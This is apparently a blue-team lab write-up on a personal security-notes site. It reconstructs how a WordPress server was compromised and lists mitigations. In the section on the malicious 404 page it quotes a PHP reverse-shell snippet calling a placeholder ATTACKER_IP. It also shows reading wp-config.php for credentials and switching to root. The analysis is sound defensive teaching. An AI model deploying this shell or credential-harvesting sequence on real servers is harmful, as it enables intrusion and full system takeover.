KARIM ASHRAF SPACE.
  • Who Am I ?
  • WRITEUPS
    • What about Practice in Cyber Security?
    • Dark Side of VSCode
    • What about Cy-nix Machine?
    • Cyberdefenders Labs
      • Web Investigation Blue Team Lab
      • Red Stealer Blue Team Lab
      • WebStrike Blue Team Lab
      • BlueSky Ransomware Blue Team Lab
      • PsExec Hunt Blue Team Lab
      • OpenWire Blue Team Lab
      • 3CX Supply Chain Blue Team Lab
      • PoisonedCredentials Lab
      • Reveal Lab
    • Lets Defend
      • Incident Responder Path
        • Cybersecurity Incident Handling Guide
          • Introduction to Incident Handling
          • Incident Handling Steps
          • Preparation
          • Detection and Analysis
          • Containment, Eradication, and Recovery
          • Post-Incident Activity
        • Incident Response on Windows
          • How to Create Incident Response Plan?
          • Incident Response Procedure
          • 3 Important Things
          • Free Tools That Can Be Used
          • Live Memory Analysis
          • Task Scheduler
          • Services
          • Registry Run Keys / Startup Folder
          • Files
          • Checklist
        • Incident Response on Linux
          • How to Create Incident Response Plan?
          • Incident Response Procedure
          • 3 Important Things
          • Users and Groups
          • Processes
          • Files and File System
          • Mounts
          • Network
          • Service
          • Cron Job
          • SSH Authorized Keys
          • Bash_rc & Bash_profile
          • Useful Log Files
        • Hacked Web Server Analysis
          • Introduction to Hacked Web Server Analysis
          • Log Analysis on Web Servers
          • Attacks on Web Servers
          • Attacks Against Web Applications
          • Vulnerabilities on Servers
          • Vulnerabilities in Programming Language
          • Discovering the Web Shell
          • Hacked Web Server Analysis Example
        • Log Analysis with Sysmon
          • Introduction and Set Up of Sysmon
          • Detecting Mimikatz with Sysmon
          • Detecting Pass The Hash with Sysmon
          • Detecting Privilege Escalation with Sysmon
        • Forensic Acquisition and Triage
          • Introduction to Forensics Acquisition and Triage
          • Acquiring Memory Image From Windows and Linux
          • Custom Image Using FTK and Mounting Image for Analysis
          • KAPE Targets for Acquisition
          • KAPE Modules for Triage and Analysis
          • Triage Using FireEye Redline
          • Acquisition and Triage of Disks Using Autopsy
        • Memory Forensics
          • What is Memory Forensics
          • Memory Analysis Procedures
        • Registry Forensics
          • Introduction to Windows Registry Forensics
          • Acquiring Registry Hives
          • Regedit and Registry Explorer
          • System, Users and Network Information
          • Shellbags
          • Shimcache
          • Amcache
          • Recent Files
          • Dialogue Boxes MRU
        • Event Log Analysis
          • Introduction to Event Logs
          • Event Log Analysis
          • Authentication Event Logs
          • Windows Scheduled Tasks Event Logs
          • Windows Services Event Logs
          • Account Management Events
          • Event Log Manipulation
          • Windows Firewall Event Logs
          • Windows Defender Event Logs
          • Powershell Command Execution Event logs
        • Browser Forensics
          • Introduction to Browser Forensics
          • Acquisition
          • Browser Artifacts
          • Tool: BrowsingHistoryView
          • Manual Browser Analysis
          • Hindsight Framework
        • GTFOBins
          • Introduction to GTFOBins
          • Shell
          • Command
          • Reverse Shell
          • Bind Shell
          • File Upload
          • File Download
          • Sudo
        • Hunting AD Attacks
          • Introduction to Active Directory
          • Hunting AS-REP Roasting Attack
          • Hunting for Kerberoasting Attacks
          • Hunting for LDAP Enumerations (Bloodhound_Sharphound)
          • Hunting for NTDS Database Dumping
          • Hunting for Golden Ticket Attacks
          • Hunting for NTLM Relay Attacks
        • Writing a Report on Security Incident
          • Introduction to Technical Writing
          • Reporting Standards
          • Reporting Style
          • Report Formatting
          • Report Templates
        • How to Prepare a Cyber Crisis Management Pla
          • Introduction to Crisis Management
          • General Preparation
          • Tools
          • Backups
          • Alerts and End of Crisis
        • Advanced Event Log Analysis
          • Process Creation
          • DNS Activity
          • File/Folder Monitoring
          • BITS Client Event Log
          • Network Connections Event Log
          • MSI Event Logs
        • USB Forensics
          • Introduction to USB Forensics
          • USB Registry Key
          • USB Event Logs
          • Folder Access Analysis via Shellbags
          • File Access Analysis via Jumplists
          • Automated USB Parsers Tools
        • Windows Disk Forensics
          • SRUM Database
          • Jumplists
          • Recycle Bin Artifacts
          • RDP Cache
          • Thumbnail Cache
    • BTLO LABS
      • Bruteforce BTLO
    • The Complete Active Directory Security Handbook
      • Introduction
      • Active Directory
      • Attack Technique 1: Pass the Hash: Use of Alternate Authentication Material (T1550)
      • Attack Technique 2: Pass the Ticket: Use of Alternate Authentication Material (T1550)
      • Attack Technique 3: Kerberoasting
      • Attack Technique 4: Golden Ticket Attack
      • Attack Technique 5: DCShadow Attack
      • Attack Technique 6: AS-REP Roasting
      • Attack Technique 7: LDAP Injection Attack
      • Attack Technique 8: PetitPotam NTLM Relay Attack on a Active Directory Certificate Services (AD CS)
      • Conclusion & References
    • Windows Privilege Escalation
      • Tools
      • Windows Version and Configuration
      • User Enumeration
      • Network Enumeration
      • Antivirus Enumeration
      • Default Writeable Folders
      • EoP - Looting for passwords
      • EoP - Incorrect permissions in services
      • EoP - Windows Subsystem for Linux (WSL)
      • EoP - Unquoted Service Paths
      • EoP - $PATH Interception
      • EoP - Named Pipes
      • EoP - Kernel Exploitation
      • EoP - AlwaysInstallElevated
      • EoP - Insecure GUI apps
      • EoP - Evaluating Vulnerable Drivers
      • EoP - Printers
      • EoP - Runas
      • EoP - Abusing Shadow Copies
      • EoP - From local administrator to NT SYSTEM
      • EoP - Living Off The Land Binaries and Scripts
      • EoP - Impersonation Privileges
      • EoP - Privileged File Write
      • References
      • Practical Labs
    • Advanced Log Analysis
      • Key Windows Event IDs for Cybersecurity Monitoring
      • Analyzing a Series of Failed Login Attempts from Multiple IP Addresses
      • Steps to Investigate Suspicious Outbound Network Traffic
      • Identifying and Responding to Lateral Movement within a Network
      • Distinguishing Between Legitimate and Malicious PowerShell Executions
      • Detecting and Analyzing a Potential Data Exfiltration Incident Using Log Data
      • Steps to Analyze PowerShell Logging (Event ID 4104) for Malicious Activity
      • How to Identify an Internal Pivot Attack Using Log Data
      • Indicators in Logs Suggesting a Privilege Escalation Attack
      • How to Detect Command and Control (C2) Communication Using Log Analysis
      • How to Analyze Logs to Detect a Brute-Force Attack on an RDP Service
      • How to Analyze Logs to Detect a Brute-Force Attack on an RDP Service
      • How to Detect the Use of Living-Off-the-Land Binaries (LOLBins) in Logs
      • How to Detect Malware Masquerading as a Legitimate Process Using Log Analysis
      • How to Detect and Analyze Lateral Movement Using Windows Event Logs
      • How to Detect Potential Ransomware Attacks in Their Early Stages Using Log Analysis
      • How to Detect and Analyze Privilege Escalation Using Windows Event Logs
      • How to Detect the Use of Mimikatz or Similar Tools in Log Data
      • How to Detect and Analyze DNS Tunneling Through Log Analysis
      • How to Detect a Pass-the-Hash (PtH) Attack Using Logs
      • How to Detect and Analyze an Attacker’s Use of a Remote Access Trojan (RAT) Using Log Data
      • How to Detect Lateral Movement Using Windows Event Logs
      • How to Detect and Investigate Data Exfiltration Using Logs
      • How to Identify and Analyze an Internal Phishing Campaign Using Email and System Logs
      • How to Detect and Analyze Ransomware Activity Using Logs
      • How to Detect Malicious PowerShell Activity Using Log Analysis
      • How to Detect and Respond to Brute-Force Attacks Using Log Data
      • How to Detect Privilege Escalation Attempts Using Windows Event Logs
      • How to Detect and Analyze Suspicious Domain Name Resolution Requests in DNS Logs
      • How to Detect and Respond to Unauthorized Access to Critical Files
      • How to Detect and Analyze Suspicious PowerShell Command Execution
      • How to Detect and Investigate Account Takeover (ATO) Attempts Using
      • How to Detect and Analyze the Use of Living Off the Land Binaries (LOLBins)
      • How to Detect and Investigate Lateral Movement
      • How to Detect and Investigate Data Exfiltration
      • How to Detect and Analyze Suspicious Activity Involving Service Accounts
      • How to Detect and Investigate Anomalous PowerShell Activity Related to Credential Dumping
      • How to Detect and Analyze the Execution of Unsigned or Malicious Executables
      • How to Detect and Investigate Abnormal Spikes in Network Traffic
    • Methods for Stealing Password in Browser
      • Important Tables and Columns
      • Important Queries
      • Profiles
      • Tools
        • HackBrowserData
        • Browser-password-stealer
        • BrowserPass
        • WebBrowserPassView
        • Infornito
        • Hindsight
        • BrowserFreak
        • BrowserStealer
    • Hack The Box Tracks
      • Soc Analyst Path 2024
        • 1. Incident Handling Process
          • Incident Handling Definition & Scope
          • Incident Handling's Value & Generic Notes
          • Cyber Kill Chain
          • Incident Handling Process Overview
          • Preparation Stage (Part 1)
          • Preparation Stage (Part 2)
          • DMARC
          • Endpoint Hardening (& EDR)
          • Network Protection
          • Privilege Identity Management / MFA / Passwords
          • Vulnerability Scanning
          • User Awareness Training
          • Active Directory Security Assessment
          • Purple Team Exercises
          • Detection & Analysis Stage (Part 1)
          • Initial Investigation
          • Incident Severity & Extent Questions
          • Incident Confidentiality & Communication
          • Detection & Analysis Stage (Part 2)
          • The Investigation
          • Initial Investigation Data
          • Creation & Usage Of IOCs
          • Identification Of New Leads & Impacted Systems
          • Data Collection & Analysis From The New Leads & Impacted Systems
          • Containment
          • Eradication
          • Recovery
          • Post-Incident Activity Stage
          • Reporting
        • 2. Security Monitoring & SIEM Fundamentals
          • What Is SIEM?
          • The Evolution Of SIEM And How It Works
          • SIEM Business Requirements & Use Cases Log Aggregation & Normalization
          • Data Flows Within A SIEM
          • What Are The Benefits Of Using A SIEM Solution
          • What Is the Elastic Stack?
          • The Elastic Stack As A SIEM Solution
          • How To Identify The Available Data
          • The Elastic Common Schema (ECS)
          • SOC Definition & Fundamentals
          • Evolution of Security Operations Centers (SOCs)
          • What Is MITRE ATT&CK?
          • What Is A SIEM Use Case?
          • How To Build SIEM Use Cases
          • SIEM Visualization Example 1: Failed Logon Attempts (All Users)
          • SIEM Visualization Example 2: Failed Logon Attempts (Disabled Users)
          • SIEM Visualization Example 3: Successful RDP Logon Related To Service Accounts
          • SIEM Visualization Example 4: Users Added or Removed from a Local Group
          • What Is Alert Triaging?
  • COURSES SUMMARY
    • TCM SEC
      • TCM linux Privilege Escalation
      • TCM OSINT
    • The SecOps Group
      • Certified AppSec Practitioner exam
      • CNSP Review
    • Cybrary
      • Cybrary Offensive Pentesting
  • TIPS&TRICKS
    • Windows Shorcuts Arrow Remover
    • Kali KEX
    • Intel TurboBoost
    • Pentest_Copilot
    • Ferdium
    • Youtube Adblock_Bybass
    • Burb-Bambdas
    • Burb Customizer
    • BetterFox
Powered by GitBook
On this page
  • Hacked Web Server Analysis: A Detailed Walkthrough
  • 1. Brute Force Attack Detection on Admin Panel
  • 2. Exploitation via Admin Panel
  • 3. Malicious 404 Error Page
  • 4. Escalation to Root Privileges
  • 5. Attack Steps
  • 1. Brute Force Attack:
  • 2. Malicious Code Injection:
  • 3. Credential Harvesting:
  • 4. Privilege Escalation:
  • 5. Root Compromise:
  • Mitigation and Protection Strategies
  • 1. Enforce Strong Credentials
  • 2. Limit Login Attempts
  • 3. Regular Updates and Patches
  • 4. Restrict Error Reporting
  • 5. Monitor Logs and Traffic
  • 6. Principle of Least Privilege
  • 7. File Integrity Monitoring
  • 8. Web Application Firewall (WAF)
  1. WRITEUPS
  2. Lets Defend
  3. Incident Responder Path
  4. Hacked Web Server Analysis

Hacked Web Server Analysis Example

Hacked Web Server Analysis: A Detailed Walkthrough

This analysis provides insights into how a WordPress-based web server was compromised and offers practical steps for detection, response, and prevention.


1. Brute Force Attack Detection on Admin Panel

Log Analysis

The attack begins with a brute force attempt on the WordPress login page (wp-login.php).

  • Command:

    cat access.log | grep POST | grep wp-login
  • Observation: The logs show numerous POST requests from the same IP (192.168.2.232), targeting wp-login.php. This indicates repeated login attempts.

    Example Log Entry:

    192.168.2.232 - - [12/Nov/2024:14:00:12 +0000] "POST /wp-login.php HTTP/1.1" 200 2456

Network Traffic Analysis

Wireshark confirms the brute force attack by filtering for POST requests to the server.

  • Wireshark Filter:

    ip.src == 192.168.2.232 && http.request.method == POST
  • Result: Multiple login attempts, eventually leading to successful credential discovery (admin:admin).


2. Exploitation via Admin Panel

Once logged in, the attacker exploits their access to upload malicious code and modify the 404 error page.

Error Log Analysis

The attacker’s activity is evident in the error logs.

  • Command:

    cat error.log
  • Key Entry:

    [12/Nov/2024:14:30:45 +0000] [error] [client 192.168.2.232] PHP Warning:  fscockopen() error in /words/test123123.php

This log suggests the attacker used the fsockopen() function for malicious purposes.


3. Malicious 404 Error Page

The attacker modifies the 404 error page to establish a reverse shell connection.

Injected Code:

<?php
$socket = fsockopen("ATTACKER_IP", 1234);
exec("/bin/bash -i <&3 >&3 2>&3");
?>
  • Functionality:

    • Opens a connection to the attacker’s system.

    • Provides shell access with the www-data user’s privileges.


4. Escalation to Root Privileges

Reading Sensitive Configuration Files

The attacker reads the WordPress configuration file to extract database credentials.

  • Command:

    cat /var/www/html/wp-config.php
  • Critical Finding:

    define('DB_PASSWORD', 'rootpassword');

The database password is the same as the root user’s password, enabling privilege escalation.

Root Privilege Escalation

Using the compromised credentials, the attacker switches to the root user.

  • Command:

    su root
  • Full System Control: The attacker achieves root-level access, enabling unrestricted control.


5. Attack Steps

1. Brute Force Attack:

  • Gained WordPress admin credentials (admin:admin) via brute force on wp-login.php.

2. Malicious Code Injection:

  • Modified the 404 error page with a reverse shell script.

3. Credential Harvesting:

  • Extracted database credentials from wp-config.php.

4. Privilege Escalation:

  • Used database credentials to switch to the root account.

5. Root Compromise:

  • Gained full control over the server.


Mitigation and Protection Strategies

1. Enforce Strong Credentials

  • Use complex, unique passwords for:

    • WordPress admin accounts.

    • Database credentials.

    • Root accounts.

  • Use password managers to prevent reuse and ensure strong password policies.

2. Limit Login Attempts

  • Deploy plugins like Limit Login Attempts Reloaded.

  • Automatically block IPs after multiple failed login attempts.

3. Regular Updates and Patches

  • Update WordPress, plugins, and server software to address known vulnerabilities.

4. Restrict Error Reporting

  • Disable verbose error reporting to prevent sensitive information leakage:

    ini_set('display_errors', 0);
    ini_set('log_errors', 1);

5. Monitor Logs and Traffic

  • Use centralized logging solutions like ELK Stack or Splunk.

  • Implement Intrusion Detection Systems (IDS) to detect anomalous traffic in real time.

6. Principle of Least Privilege

  • Ensure that WordPress and the web server run under non-root accounts.

  • Avoid using the same password for different system components.

7. File Integrity Monitoring

  • Use tools like Tripwire or OSSEC to monitor changes in critical files (e.g., 404.php).

8. Web Application Firewall (WAF)

  • Deploy a WAF (e.g., Cloudflare or ModSecurity) to block:

    • Brute force attacks.

    • Malicious payloads.

    • Suspicious query strings (e.g., SQL Injection).


Conclusion

This incident underscores the importance of proactive security measures and continuous monitoring. A single weak point, such as a poorly secured admin panel, can lead to full system compromise. Implementing best practices, monitoring logs, and maintaining up-to-date software are critical for preventing similar attacks.

PreviousDiscovering the Web ShellNextLog Analysis with Sysmon

Last updated 6 months ago

Regularly monitor the .

WordPress Vulnerability Database